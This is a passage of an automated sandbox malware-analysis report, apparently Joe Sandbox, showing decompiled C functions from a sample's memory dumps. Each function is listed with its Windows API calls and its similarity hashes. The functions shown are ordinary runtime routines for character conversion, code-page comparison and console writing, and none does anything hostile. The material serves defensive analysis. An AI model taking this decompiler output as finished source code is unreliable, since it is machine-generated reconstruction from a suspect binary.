        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: HeapProcess
        • String ID:
        • API String ID: 54951025-0
        • Opcode ID: 853cb6cf9af2aa9ffd44843e043c1cfecde058b87429f58ab31b870cb88ce46e
        • Instruction ID: 611b545593b3d2e4edff44d2a8de3b9403aebcbf3b24379336f62b9675d7cf94
        • Opcode Fuzzy Hash: 853cb6cf9af2aa9ffd44843e043c1cfecde058b87429f58ab31b870cb88ce46e
        • Instruction Fuzzy Hash: F3A01130A02202CB8300AF32BE0CB083AA8BA08280B808028E008C0220EB3080828A00
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
        • Instruction ID: fa9b1bb3b7addc612f684838101b2d2085241f349b7c115856b2d1a71459c6e6
        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
        • Instruction Fuzzy Hash: 0541B571D1051CEBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
        • Instruction ID: 68a42f234c4d5b7c8d00bb974057f570423e623d65decc3924a2b87886151272
        • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
        • Instruction Fuzzy Hash: 6A0180B8A01109EFCB44DF98C590EAEF7B5FB48310B208599E919A7341D730EE51DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
        • Instruction ID: 4d3f7e9a8cab99d15ba8e95a15caecfad213766a8de30c8b41d00eb45b6f0992
        • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
        • Instruction Fuzzy Hash: 1B019278A01109EFCB44DF98C590EAEF7B6FF48310F208599E919A7341D730AE41DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.269168079.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_d00000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c83a6b6a472ec04d6c9d5fb753ffd229562f112202eda93caf714974bbbe2610
        • Instruction ID: 88b96bc2bf26666b3bf0ee9af6500240d9f2b4d31e6a717651da7f404f3bcf61
        • Opcode Fuzzy Hash: c83a6b6a472ec04d6c9d5fb753ffd229562f112202eda93caf714974bbbe2610
        • Instruction Fuzzy Hash: 36E092BA34021487C700CA15D480E43B7AAF7D8230B5182A0CA1D87346C930EDC385E2
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 69%
        			E00268853(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
        				signed int _v8;
        				int _v12;
        				void* _v24;
        				signed int _t49;
        				signed int _t54;
        				int _t58;
        				signed int _t60;
        				short* _t62;
        				signed int _t66;
        				short* _t70;
        				int _t71;
        				int _t78;
        				short* _t81;
        				signed int _t87;
        				signed int _t90;
        				void* _t95;
        				void* _t96;
        				int _t98;
        				short* _t101;
        				int _t103;
        				signed int _t106;
        				short* _t107;
        				void* _t110;
        
        				_push(__ecx);
        				_push(__ecx);
        				_t49 =  *0x273018; // 0x16a19189
        				_v8 = _t49 ^ _t106;
        				_push(__esi);
        				_t103 = _a20;
        				if(_t103 > 0) {
        					_t78 = E0026914F(_a16, _t103);
        					_t110 = _t78 - _t103;
        					_t4 = _t78 + 1; // 0x1
        					_t103 = _t4;
        					if(_t110 >= 0) {
        						_t103 = _t78;
        					}
        				}
        				_t98 = _a32;
        				if(_t98 == 0) {
        					_t98 =  *( *_a4 + 8);
        					_a32 = _t98;
        				}
        				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
        				_v12 = _t54;
        				if(_t54 == 0) {
        					L38:
        					return E002629BB(_v8 ^ _t106);
        				} else {
        					_t95 = _t54 + _t54;
        					_t85 = _t95 + 8;
        					asm("sbb eax, eax");
        					if((_t95 + 0x00000008 & _t54) == 0) {
        						_t81 = 0;
        						__eflags = 0;
        						L14:
        						if(_t81 == 0) {
        							L36:
        							_t105 = 0;
        							L37:
        							E00266F6B(_t81);
        							goto L38;
        						}
        						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
        						_t121 = _t58;
        						if(_t58 == 0) {
        							goto L36;
        						}
        						_t100 = _v12;
        						_t60 = E00266564(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
        						_t105 = _t60;
        						if(_t105 == 0) {
        							goto L36;
        						}
        						if((_a12 & 0x00000400) == 0) {
        							_t96 = _t105 + _t105;
        							_t87 = _t96 + 8;
        							__eflags = _t96 - _t87;
        							asm("sbb eax, eax");
        							__eflags = _t87 & _t60;
        							if((_t87 & _t60) == 0) {
        								_t101 = 0;
        								__eflags = 0;
        								L30:
        								__eflags = _t101;
        								if(__eflags == 0) {
        									L35:
        									E00266F6B(_t101);
        									goto L36;
        								}
        								_t62 = E00266564(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
        								__eflags = _t62;
        								if(_t62 == 0) {
        									goto L35;
        								}
        								_push(0);
        								_push(0);
        								__eflags = _a28;
        								if(_a28 != 0) {
        									_push(_a28);
        									_push(_a24);
        								} else {
        									_push(0);
        									_push(0);
        								}
        								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
        								__eflags = _t105;
        								if(_t105 != 0) {
        									E00266F6B(_t101);
        									goto L37;
        								} else {
        									goto L35;
        								}
        							}
        							_t90 = _t96 + 8;
        							__eflags = _t96 - _t90;
        							asm("sbb eax, eax");
        							_t66 = _t60 & _t90;
        							_t87 = _t96 + 8;
        							__eflags = _t66 - 0x400;
        							if(_t66 > 0x400) {
        								__eflags = _t96 - _t87;
        								asm("sbb eax, eax");
        								_t101 = E002646B0(_t87, _t66 & _t87);
        								_pop(_t87);
        								__eflags = _t101;
        								if(_t101 == 0) {
        									goto L35;
        								}
        								 *_t101 = 0xdddd;
        								L28:
        								_t101 =  &(_t101[4]);
        								goto L30;
        							}
        							__eflags = _t96 - _t87;
        							asm("sbb eax, eax");
        							E0026BFA0();
        							_t101 = _t107;
        							__eflags = _t101;
        							if(_t101 == 0) {
        								goto L35;
        							}
        							 *_t101 = 0xcccc;
        							goto L28;
        						}
        						_t70 = _a28;
        						if(_t70 == 0) {
        							goto L37;
        						}
        						_t125 = _t105 - _t70;
        						if(_t105 > _t70) {
        							goto L36;
        						}
        						_t71 = E00266564(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
        						_t105 = _t71;
        						if(_t71 != 0) {
        							goto L37;
        						}
        						goto L36;
        					}
        					asm("sbb eax, eax");
        					_t72 = _t54 & _t95 + 0x00000008;
        					_t85 = _t95 + 8;
        					if((_t54 & _t95 + 0x00000008) > 0x400) {
        						__eflags = _t95 - _t85;
        						asm("sbb eax, eax");
        						_t81 = E002646B0(_t85, _t72 & _t85);
        						_pop(_t85);
        						__eflags = _t81;
        						if(__eflags == 0) {
        							goto L36;
        						}
        						 *_t81 = 0xdddd;
        						L12:
        						_t81 =  &(_t81[4]);
        						goto L14;
        					}
        					asm("sbb eax, eax");
        					E0026BFA0();
        					_t81 = _t107;
        					if(_t81 == 0) {
        						goto L36;
        					}
        					 *_t81 = 0xcccc;
        					goto L12;
        				}
        			}

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,W\&,00000000,?,?,?,00268AA4,?,?,00000100), ref: 002688AD
        • __alloca_probe_16.LIBCMT ref: 002688E5
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00268AA4,?,?,00000100,?,?,?), ref: 00268933
        • __alloca_probe_16.LIBCMT ref: 002689CA
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00268A2D
        • __freea.LIBCMT ref: 00268A3A
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        • __freea.LIBCMT ref: 00268A43
        • __freea.LIBCMT ref: 00268A68
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
        • String ID: W\&
        • API String ID: 2597970681-1387361922
        • Opcode ID: 3b90bad7f2d91844969e3a08ce2f42e82e601955718ed36c877d301712c63050
        • Instruction ID: 3403a379ff7b55b9d50530792f4e1bbcc35033d2bb80ca051bec6f53c0fe2e3d
        • Opcode Fuzzy Hash: 3b90bad7f2d91844969e3a08ce2f42e82e601955718ed36c877d301712c63050
        • Instruction Fuzzy Hash: 1A51D072630216ABDF258EA4DC45EBB77A9EB44750F24472AFC05D6240EF74DCE0DA90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E0026928E(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
        				signed int _v8;
        				char _v22;
        				struct _cpinfo _v28;
        				short* _v32;
        				int _v36;
        				char* _v40;
        				int _v44;
        				intOrPtr _v48;
        				void* _v60;
        				signed int _t63;
        				int _t70;
        				signed int _t72;
        				short* _t73;
        				signed int _t77;
        				short* _t87;
        				void* _t89;
        				void* _t92;
        				int _t99;
        				intOrPtr _t101;
        				intOrPtr _t102;
        				signed int _t112;
        				char* _t114;
        				char* _t115;
        				void* _t120;
        				void* _t121;
        				intOrPtr _t122;
        				intOrPtr _t123;
        				intOrPtr* _t125;
        				short* _t126;
        				int _t128;
        				int _t129;
        				short* _t130;
        				intOrPtr* _t131;
        				signed int _t132;
        				short* _t133;
        
        				_t63 =  *0x273018; // 0x16a19189
        				_v8 = _t63 ^ _t132;
        				_t128 = _a20;
        				_v44 = _a4;
        				_v48 = _a8;
        				_t67 = _a24;
        				_v40 = _a24;
        				_t125 = _a16;
        				_v36 = _t125;
        				if(_t128 <= 0) {
        					if(_t128 >= 0xffffffff) {
        						goto L2;
        					} else {
        						goto L5;
        					}
        				} else {
        					_t128 = E0026914F(_t125, _t128);
        					_t67 = _v40;
        					L2:
        					_t99 = _a28;
        					if(_t99 <= 0) {
        						if(_t99 < 0xffffffff) {
        							goto L5;
        						} else {
        							goto L7;
        						}
        					} else {
        						_t99 = E0026914F(_t67, _t99);
        						L7:
        						_t70 = _a32;
        						if(_t70 == 0) {
        							_t70 =  *( *_v44 + 8);
        							_a32 = _t70;
        						}
        						if(_t128 == 0 || _t99 == 0) {
        							if(_t128 != _t99) {
        								if(_t99 <= 1) {
        									if(_t128 <= 1) {
        										if(GetCPInfo(_t70,  &_v28) == 0) {
        											goto L5;
        										} else {
        											if(_t128 <= 0) {
        												if(_t99 <= 0) {
        													goto L36;
        												} else {
        													_t89 = 2;
        													if(_v28 >= _t89) {
        														_t114 =  &_v22;
        														if(_v22 != 0) {
        															_t131 = _v40;
        															while(1) {
        																_t122 =  *((intOrPtr*)(_t114 + 1));
        																if(_t122 == 0) {
        																	goto L15;
        																}
        																_t101 =  *_t131;
        																if(_t101 <  *_t114 || _t101 > _t122) {
        																	_t114 = _t114 + _t89;
        																	if( *_t114 != 0) {
        																		continue;
        																	} else {
        																		goto L15;
        																	}
        																}
        																goto L63;
        															}
        														}
        													}
        													goto L15;
        												}
        											} else {
        												_t92 = 2;
        												if(_v28 >= _t92) {
        													_t115 =  &_v22;
        													if(_v22 != 0) {
        														while(1) {
        															_t123 =  *((intOrPtr*)(_t115 + 1));
        															if(_t123 == 0) {
        																goto L17;
        															}
        															_t102 =  *_t125;
        															if(_t102 <  *_t115 || _t102 > _t123) {
        																_t115 = _t115 + _t92;
        																if( *_t115 != 0) {
        																	continue;
        																} else {
        																	goto L17;
        																}
        															}
        															goto L63;
        														}
        													}
        												}
        												goto L17;
        											}
        										}
        									} else {
        										L17:
        										_push(3);
        										goto L13;
        									}
        								} else {
        									L15:
        								}
        							} else {
        								_push(2);
        								L13:
        							}
        						} else {
        							L36:
        							_t126 = 0;
        							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
        							_v44 = _t72;
        							if(_t72 == 0) {
        								L5:
        							} else {
        								_t120 = _t72 + _t72;
        								asm("sbb eax, eax");
        								if((_t120 + 0x00000008 & _t72) == 0) {
        									_t73 = 0;
        									_v32 = 0;
        									goto L45;
        								} else {
        									asm("sbb eax, eax");
        									_t85 = _t72 & _t120 + 0x00000008;
        									_t112 = _t120 + 8;
        									if((_t72 & _t120 + 0x00000008) > 0x400) {
        										asm("sbb eax, eax");
        										_t87 = E002646B0(_t112, _t85 & _t112);
        										_v32 = _t87;
        										if(_t87 == 0) {
        											goto L61;
        										} else {
        											 *_t87 = 0xdddd;
        											goto L43;
        										}
        									} else {
        										asm("sbb eax, eax");
        										E0026BFA0();
        										_t87 = _t133;
        										_v32 = _t87;
        										if(_t87 == 0) {
        											L61:
        											_t100 = _v32;
        										} else {
        											 *_t87 = 0xcccc;
        											L43:
        											_t73 =  &(_t87[4]);
        											_v32 = _t73;
        											L45:
        											if(_t73 == 0) {
        												goto L61;
        											} else {
        												_t129 = _a32;
        												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
        													goto L61;
        												} else {
        													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
        													_v36 = _t77;
        													if(_t77 == 0) {
        														goto L61;
        													} else {
        														_t121 = _t77 + _t77;
        														_t108 = _t121 + 8;
        														asm("sbb eax, eax");
        														if((_t121 + 0x00000008 & _t77) == 0) {
        															_t130 = _t126;
        															goto L56;
        														} else {
        															asm("sbb eax, eax");
        															_t81 = _t77 & _t121 + 0x00000008;
        															_t108 = _t121 + 8;
        															if((_t77 & _t121 + 0x00000008) > 0x400) {
        																asm("sbb eax, eax");
        																_t130 = E002646B0(_t108, _t81 & _t108);
        																_pop(_t108);
        																if(_t130 == 0) {
        																	goto L59;
        																} else {
        																	 *_t130 = 0xdddd;
        																	goto L54;
        																}
        															} else {
        																asm("sbb eax, eax");
        																E0026BFA0();
        																_t130 = _t133;
        																if(_t130 == 0) {
        																	L59:
        																	_t100 = _v32;
        																} else {
        																	 *_t130 = 0xcccc;
        																	L54:
        																	_t130 =  &(_t130[4]);
        																	L56:
        																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
        																		goto L59;
        																	} else {
        																		_t100 = _v32;
        																		_t126 = E00266333(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
        																	}
        																}
        															}
        														}
        														E00266F6B(_t130);
        													}
        												}
        											}
        										}
        									}
        								}
        								E00266F6B(_t100);
        							}
        						}
        					}
        				}
        				L63:
        				return E002629BB(_v8 ^ _t132);
        			}

        APIs
        • GetCPInfo.KERNEL32(0089F0A0,0089F0A0,?,7FFFFFFF,?,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?,0089F0A0), ref: 0026933A
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000009,0089F0A0,0089F0A0,00000000,00000000,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 002693BD
        • __alloca_probe_16.LIBCMT ref: 002693F5
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000001,0089F0A0,0089F0A0,00000000,00269567,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 00269450
        • __alloca_probe_16.LIBCMT ref: 0026949F
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000009,0089F0A0,0089F0A0,00000000,00000000,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 00269467
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000001,0089F0A0,0089F0A0,00000000,0089F0A0,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 002694E3
        • __freea.LIBCMT ref: 0026950E
        • __freea.LIBCMT ref: 0026951A
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
        • String ID:
        • API String ID: 3256262068-0
        • Opcode ID: 0ee0b04173fa58a3d404fba1ece44143371e964666c9e073b66f613eba416741
        • Instruction ID: 1fc09f7c748d35bfa61373416bbbcf00cbb86ad607a2f40e6ef4cf53f875c171
        • Opcode Fuzzy Hash: 0ee0b04173fa58a3d404fba1ece44143371e964666c9e073b66f613eba416741
        • Instruction Fuzzy Hash: 4A91D471E302469ADF218E75C885AEE7BBDAF49710F584159E805E7280DF34DCE1CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E002696AD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
        				signed int _v8;
        				signed char _v15;
        				char _v16;
        				void _v24;
        				short _v28;
        				char _v31;
        				void _v32;
        				long _v36;
        				intOrPtr _v40;
        				void* _v44;
        				signed int _v48;
        				signed char* _v52;
        				long _v56;
        				int _v60;
        				signed int _t78;
        				signed int _t80;
        				int _t86;
        				void* _t94;
        				long _t97;
        				void _t105;
        				void* _t112;
        				signed int _t116;
        				signed int _t118;
        				signed char _t123;
        				signed char _t128;
        				intOrPtr _t129;
        				signed int _t131;
        				signed char* _t133;
        				intOrPtr* _t135;
        				signed int _t136;
        				void* _t137;
        
        				_t78 =  *0x273018; // 0x16a19189
        				_v8 = _t78 ^ _t136;
        				_t80 = _a8;
        				_t118 = _t80 >> 6;
        				_t116 = (_t80 & 0x0000003f) * 0x30;
        				_t133 = _a12;
        				_v52 = _t133;
        				_v48 = _t118;
        				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x273f60 + _t118 * 4)) + _t116 + 0x18));
        				_v40 = _a16 + _t133;
        				_t86 = GetConsoleCP();
        				_t135 = _a4;
        				_v60 = _t86;
        				 *_t135 = 0;
        				 *((intOrPtr*)(_t135 + 4)) = 0;
        				 *((intOrPtr*)(_t135 + 8)) = 0;
        				while(_t133 < _v40) {
        					_v28 = 0;
        					_v31 =  *_t133;
        					_t129 =  *((intOrPtr*)(0x273f60 + _v48 * 4));
        					_t123 =  *(_t129 + _t116 + 0x2d);
        					if((_t123 & 0x00000004) == 0) {
        						if(( *(E00266BA1(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
        							_push(1);
        							_push(_t133);
        							goto L8;
        						} else {
        							if(_t133 >= _v40) {
        								_t131 = _v48;
        								 *((char*)( *((intOrPtr*)(0x273f60 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
        								 *( *((intOrPtr*)(0x273f60 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x273f60 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
        								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
        							} else {
        								_t112 = E00267F6A( &_v28, _t133, 2);
        								_t137 = _t137 + 0xc;
        								if(_t112 != 0xffffffff) {
        									_t133 =  &(_t133[1]);
        									goto L9;
        								}
        							}
        						}
        					} else {
        						_t128 = _t123 & 0x000000fb;
        						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
        						_push(2);
        						_v15 = _t128;
        						 *(_t129 + _t116 + 0x2d) = _t128;
        						_push( &_v16);
        						L8:
        						_push( &_v28);
        						_t94 = E00267F6A();
        						_t137 = _t137 + 0xc;
        						if(_t94 != 0xffffffff) {
        							L9:
        							_t133 =  &(_t133[1]);
        							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
        							_v56 = _t97;
        							if(_t97 != 0) {
        								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
        									L19:
        									 *_t135 = GetLastError();
        								} else {
        									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
        									if(_v36 >= _v56) {
        										if(_v31 != 0xa) {
        											goto L16;
        										} else {
        											_t105 = 0xd;
        											_v32 = _t105;
        											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
        												goto L19;
        											} else {
        												if(_v36 >= 1) {
        													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
        													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
        													goto L16;
        												}
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        					goto L20;
        					L16:
        				}
        				L20:
        				return E002629BB(_v8 ^ _t136);
        			}

        APIs
        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00269E22,?,00000000,?,00000000,00000000), ref: 002696EF
        • __fassign.LIBCMT ref: 0026976A
        • __fassign.LIBCMT ref: 00269785
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002697AB
        • WriteFile.KERNEL32(?,?,00000000,00269E22,00000000,?,?,?,?,?,?,?,?,?,00269E22,?), ref: 002697CA
        • WriteFile.KERNEL32(?,?,00000001,00269E22,00000000,?,?,?,?,?,?,?,?,?,00269E22,?), ref: 00269803
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID:
        • API String ID: 1324828854-0
        • Opcode ID: 83a01840890a629c4e2a4222b114a2b19e8a239ae741a9c370d48621211d9045
        • Instruction ID: 9ab9997cf284bd8a723c4120c8d7c62a48dc0579cdf394286804d6d858ca98e3
        • Opcode Fuzzy Hash: 83a01840890a629c4e2a4222b114a2b19e8a239ae741a9c370d48621211d9045
        • Instruction Fuzzy Hash: 9151B371E10209DFCB10CFA8D885AEEBBF8EF0A710F14415AE955E7251DA70A9D1CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 81%
        			E00266E4E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
        				signed int _v8;
        				int _v12;
        				char _v16;
        				intOrPtr _v24;
        				char _v28;
        				void* _v40;
        				signed int _t34;
        				signed int _t40;
        				int _t46;
        				int _t53;
        				void* _t55;
        				int _t57;
        				signed int _t63;
        				int _t67;
        				short* _t69;
        				signed int _t70;
        				short* _t71;
        
        				_t34 =  *0x273018; // 0x16a19189
        				_v8 = _t34 ^ _t70;
        				E002647F8(__ebx,  &_v28, __edx, _a4);
        				_t57 = _a24;
        				if(_t57 == 0) {
        					_t53 =  *(_v24 + 8);
        					_t57 = _t53;
        					_a24 = _t53;
        				}
        				_t67 = 0;
        				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
        				_v12 = _t40;
        				if(_t40 == 0) {
        					L15:
        					if(_v16 != 0) {
        						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
        					}
        					return E002629BB(_v8 ^ _t70);
        				}
        				_t55 = _t40 + _t40;
        				_t17 = _t55 + 8; // 0x8
        				asm("sbb eax, eax");
        				if((_t17 & _t40) == 0) {
        					_t69 = 0;
        					L11:
        					if(_t69 != 0) {
        						E00262CE0(_t67, _t69, _t67, _t55);
        						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
        						if(_t46 != 0) {
        							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
        						}
        					}
        					L14:
        					E00266F6B(_t69);
        					goto L15;
        				}
        				_t20 = _t55 + 8; // 0x8
        				asm("sbb eax, eax");
        				_t48 = _t40 & _t20;
        				_t21 = _t55 + 8; // 0x8
        				_t63 = _t21;
        				if((_t40 & _t20) > 0x400) {
        					asm("sbb eax, eax");
        					_t69 = E002646B0(_t63, _t48 & _t63);
        					if(_t69 == 0) {
        						goto L14;
        					}
        					 *_t69 = 0xdddd;
        					L9:
        					_t69 =  &(_t69[4]);
        					goto L11;
        				}
        				asm("sbb eax, eax");
        				E0026BFA0();
        				_t69 = _t71;
        				if(_t69 == 0) {
        					goto L14;
        				}
        				 *_t69 = 0xcccc;
        				goto L9;
        			}

        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,?,00000100,W\&,00000000,00000001,00000020,00000100,?,?,00000000), ref: 00266E9B
        • __alloca_probe_16.LIBCMT ref: 00266ED3
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00266F24
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00266F36
        • __freea.LIBCMT ref: 00266F3F
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
